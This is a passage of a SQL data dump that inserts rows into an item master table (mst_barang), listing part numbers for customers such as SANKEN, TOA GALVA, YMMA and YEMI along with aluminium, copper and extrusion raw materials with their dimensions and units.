null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0244', '0', '', 'APH44400-621 A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSJ-0001', '0', '', 'HAP33513-723A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN JAPAN'); INSERT INTO mst_barang VALUES ('FTG-0001', '0', '', '501-07-024-70/CP187nobuffing', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOA GALVA'); INSERT INTO mst_barang VALUES ('FTG-0002', '0', '', '501-07-026-70/CP237', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOA GALVA'); INSERT INTO mst_barang VALUES ('FTG-0003', '0', '', '501-07-142-00/handlebracketMF', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOA GALVA'); INSERT INTO mst_barang VALUES ('FTG-0004', '0', '', '501-07-206-90/controlpanel', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOA GALVA'); INSERT INTO mst_barang VALUES ('FTG-0005', '0', '', '501-07-207-20/tunercase', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOA GALVA'); INSERT INTO mst_barang VALUES ('FTG-0006', '0', '', '501-07-208-70/tunercover', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOA GALVA'); INSERT INTO mst_barang VALUES ('FTG-0007', '0', '', '501-07-253-70/F1000WPWallBracket', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOA GALVA'); INSERT INTO mst_barang VALUES ('FTG-0008', '0', '', '501-07-254-40/F2000WPWallBracket', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOA GALVA'); INSERT INTO mst_barang VALUES ('FTG-0009', '0', '', '501-07-255-30/F1000WPSpeakerbracket', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOA GALVA'); INSERT INTO mst_barang VALUES ('FTG-0010', '0', '', '501-07-256-40/F2000WPSpeakerbracket', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOA GALVA'); INSERT INTO mst_barang VALUES ('FTG-0011', '0', '', '501-07-408-50/BS-1015BS', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOA GALVA'); INSERT INTO mst_barang VALUES ('FTG-0012', '0', '', '501-08-136-80/heatsink', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOA GALVA'); INSERT INTO mst_barang VALUES ('FTG-0013', '0', '', '501-27-196-50/handlebracketw/blk', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOA GALVA'); INSERT INTO mst_barang VALUES ('FTG-0014', '0', '', '501-27-365-70/PE-154BS', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOA GALVA'); INSERT INTO mst_barang VALUES ('FYA-0001', '0', '', 'V702680', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0002', '0', '', 'V776520', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0003', '0', '', 'V786660WA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0004', '0', '', 'WC40830', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0005', '0', '', 'WD18590 MODIF.', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0006', '0', '', 'WD34730', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0007', '0', '', 'WD94300A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0008', '0', '', 'WE08730', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0009', '0', '', 'WE15330/WG80390', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0010', '0', '', 'WE15890/WG80380', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0011', '0', '', 'WE15900/WG80370', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0012', '0', '', 'WF54840', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0013', '0', '', 'WF54850/WG80410', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0014', '0', '', 'WG12050/WG80420', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0015', '0', '', 'WG12060/WG80430', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0016', '0', '', 'WG12070/WG80400', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0017', '0', '', 'WG79990(Thern sheet only)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0018', '0', '', 'WG81820', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0019', '0', '', 'WG98730BA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0020', '0', '', 'WG98730MF', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0021', '0', '', 'WH00930', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0022', '0', '', 'WH13020BA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0023', '0', '', 'WH13020MF', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0024', '0', '', 'WH15130', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0025', '0', '', 'WH15140', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0026', '0', '', 'WH15150', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0027', '0', '', 'WH45700', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0028', '0', '', 'WJ14710', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0029', '0', '', 'WJ14720', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0030', '0', '', 'WJ16500', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0031', '0', '', 'WJ17290', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0032', '0', '', 'WJ45230', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0033', '0', '', 'WJ91580', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0034', '0', '', 'WJ94790BA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0035', '0', '', 'WJ94790MF', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0036', '0', '', 'WK14070', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0037', '0', '', 'WK14080', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0038', '0', '', 'WK78660', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0039', '0', '', 'WK79870 BA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0040', '0', '', 'WK79870 MF', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0041', '0', '', 'WK79880 ( L )', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0042', '0', '', 'WK79940 ( R )', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0043', '0', '', 'WM14970', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0044', '0', '', 'WM14980', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0045', '0', '', 'WM47210', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0046', '0', '', 'WM69000', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0047', '0', '', 'WM69020', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0048', '0', '', 'WM69030', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0049', '0', '', 'WM83390', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0050', '0', '', 'WN12150', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0051', '0', '', 'WN13310', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0052', '0', '', 'WN53320', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0053', '0', '', 'WP01280', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0054', '0', '', 'WP20300', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0055', '0', '', 'WP20580', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0056', '0', '', 'WP20600', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0057', '0', '', 'WP21310', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0058', '0', '', 'WP22570', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0059', '0', '', 'WP22630', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0060', '0', '', 'WP22700 BA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0061', '0', '', 'WP22700 MF', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0062', '0', '', 'WP27730', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0063', '0', '', 'WP93120', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0064', '0', '', 'WP93130', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0065', '0', '', 'WP93140', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0066', '0', '', 'WP93150', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0067', '0', '', 'WS08710', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0068', '0', '', 'WS39620', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0069', '0', '', 'WT46090', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0070', '0', '', 'WT46110', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0071', '0', '', 'WT87950', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0072', '0', '', 'WT87970', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0073', '0', '', 'WU12800', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0074', '0', '', 'WU13170', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0075', '0', '', 'WU30150', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0076', '0', '', 'WV38420', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0077', '0', '', 'WV50980', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0078', '0', '', 'WV50990', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0079', '0', '', 'WW31910', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0080', '0', '', 'WY91820', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0081', '0', '', 'ZC89370', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0082', '0', '', 'ZA88180', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0083', '0', '', 'ZA99150', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0084', '0', '', 'ZE26630', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0085', '0', '', 'ZF38310', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0086', '0', '', 'ZF38320', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0087', '0', '', 'ZF38330', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0088', '0', '', 'ZF38340', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0089', '0', '', 'ZE63230', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYA-0090', '0', '', 'ZF60070', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('FYI-0001', '0', '', 'V696570', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('FYI-0002', '0', '', 'V986330', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('FYI-0003', '0', '', 'V986680', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('FYI-0004', '0', '', 'WA10780BA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('FYI-0005', '0', '', 'WA10780MF3mm', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('FYI-0006', '0', '', 'WB27950BA(t=3mm)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('FYI-0007', '0', '', 'WB27950MF(t=3mm)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('FYI-0008', '0', '', 'WB27960BA(t=3mm)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('FYI-0009', '0', '', 'WB27960MF(t=3mm)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('FYI-0010', '0', '', 'WB96410', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('FYI-0011', '0', '', 'WD58680', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('FYI-0012', '0', '', 'WF33690', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('FYI-0013', '0', '', 'WF60800', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('FYI-0014', '0', '', 'WF85590', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('FYI-0015', '0', '', 'WH79060', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('FYI-0016', '0', '', 'WK12380BA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('FYI-0017', '0', '', 'WK12380MF', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('FYI-0018', '0', '', 'WK87830', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('FYI-0019', '0', '', 'WK87850', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('FYI-0020', '0', '', 'WP49440', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('FYI-0021', '0', '', 'WY74640', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('FYI-0022', '0', '', 'WY74650', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('FYI-0023', '0', '', 'ZC64240', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('FYI-0024', '0', '', 'ZD93680', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('FYI-0025', '0', '', 'ZD21910', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('FYI-0026', '0', '', 'ZD21920', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('FYI-0027', '0', '', 'ZD55040', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('FYI-0028', '0', '', 'ZD22000', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('FYI-0029', '0', '', 'ZD91900', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('FYI-0030', '0', '', 'ZD91920', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('FYJ-0001', '0', '', 'WM47211', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YAMAHA CORPORATION'); INSERT INTO mst_barang VALUES ('RAC-0001', '1', 'RAC', '', 'Aluminium Coil', '', '', null, null, null, null, null, null, '', '0.40x114.20mm', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RAC-0002', '1', 'RAC', '', 'Aluminium Coil', '', '', null, null, null, null, null, null, '', '0.50x114.20mm', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RAC-0003', '1', 'RAC', '', 'Aluminium Coil', '', '', null, null, null, null, null, null, '', '0.5x70mmxCoil H12', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RAC-0004', '1', 'RAC', '', 'Aluminium Coil', '', '', null, null, null, null, null, null, '', '0.50x45mm', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RAC-0005', '1', 'RAC', '', 'Aluminium Coil', '', '', null, null, null, null, null, null, '', '0.50x55mm', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RAC-0006', '1', 'RAC', '', 'Aluminium Coil', '', '', null, null, null, null, null, null, '', '0.50x80mm', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RAC-0007', '1', 'RAC', '', 'Aluminium Coil', '', '', null, null, null, null, null, null, '', '0.50x89.5mm', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RAC-0008', '1', 'RAC', '', 'Aluminium Coil', '', '', null, null, null, null, null, null, '', '1.5x33mm', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RAC-0009', '1', 'RAC', '', 'Aluminium Coil', '', '', null, null, null, null, null, null, '', '1.5x35mm', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RAC-0010', '1', 'RAC', '', 'Aluminium Coil', '', '', null, null, null, null, null, null, '', '1.5x49mm', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RAC-0011', '1', 'RAC', '', 'Aluminium Coil', '', '', null, null, null, null, null, null, '', '1.5x60mm', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RAO-0001', '1', 'RAR', '', 'Aluminium Circle', '', '', null, null, null, null, null, null, '', '1.0X.245 ', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RAO-0002', '1', 'RAR', '', 'Aluminium Circle', '', '', null, null, null, null, null, null, '', 'Ø 200, T=1.0', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RAO-0003', '1', 'RAR', '', 'Aluminium Circle', '', '', null, null, null, null, null, null, '', 'Ø 203, T=1.0', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RAS-0001', '1', 'RAS', '', 'Aluminium Sheet', '', '', null, null, null, null, null, null, '', '2 X 1220 X 2440', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RAS-0002', '1', 'RAS', '', 'Aluminium Sheet', '', '', null, null, null, null, null, null, '', '1.0x1000x2000 H12', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RAS-0003', '1', 'RAS', '', 'Aluminium Sheet', '', '', null, null, null, null, null, null, '', '1.5x1000x2000', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RAS-0004', '1', 'RAS', '', 'Aluminium Sheet', '', '', null, null, null, null, null, null, '', '2.0x1000x2000', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RAS-0005', '1', 'RAS', '', 'Aluminium Sheet', '', '', null, null, null, null, null, null, '', '3.0x1000x2000', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RAS-0006', '1', 'RAS', '', 'Aluminium Sheet', '', '', null, null, null, null, null, null, '', '3 X 1220 X 2440', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RAS-0007', '1', 'RAS', '', 'Aluminium Sheet', '', '', null, null, null, null, null, null, '', '1.5 X 1220 X 2440', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RAS-0008', '1', 'RAS', '', 'Aluminium Sheet', '', '', null, null, null, null, null, null, '', '1.6 X 914 X 4800', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RCU-0001', '1', 'RMO', '', 'Copper', '', '', null, null, null, null, null, null, '', '0.5 x 365x 1200 Tembaga', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('REA-0001', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3130', null, null, 'NA', '2975', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0002', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3970', null, null, 'MF', '3393', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0003', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '1990', null, null, 'NA', '3990', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0004', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3970', null, null, 'NA', '3991', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0005', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4000', null, null, 'NA', '3991', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0006', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'MF', '3992', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0007', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3740', null, null, 'NA', '3993', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0008', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2000', null, null, 'NA', '4127', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0009', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2000', null, null, 'MF', '4146', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0010', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3940', null, null, 'BA', '4166', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0011', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'BA', '4166', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0012', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3940', null, null, 'MF', '4166', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0013', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3960', null, null, 'MF', '4166', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0014', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4000', null, null, 'MF', '4169', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0015', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3970', null, null, 'MF', '4172', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0016', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4010', null, null, 'MF', '4178', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0017', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2000', null, null, 'NA', '4186', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0018', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3840', null, null, 'NA', '4186', 'KG', null, '', '', 